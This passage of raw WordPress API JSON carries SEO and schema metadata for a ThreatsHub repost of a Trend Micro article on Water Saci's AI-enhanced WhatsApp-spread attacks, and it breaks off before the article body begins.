Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","og_locale":"en_US","og_type":"article","og_title":"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2025-12-02T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"25 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp","datePublished":"2025-12-02T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/"},"wordCount":5058,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Artificial Intelligence (AI)","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","url":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","name":"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","datePublished":"2025-12-02T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=59779"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59779\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=59779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=59779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=59779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":59779,"date":"2025-12-02T00:00:00","date_gmt":"2025-12-02T00:00:00","guid":{"rendered":"urn:uuid:02e593c3-80d7-c25c-69ae-d408b529fdbb"},"modified":"2025-12-02T00:00:00","modified_gmt":"2025-12-02T00:00:00","slug":"unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","title":{"rendered":"Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp"},"content":{"rendered":"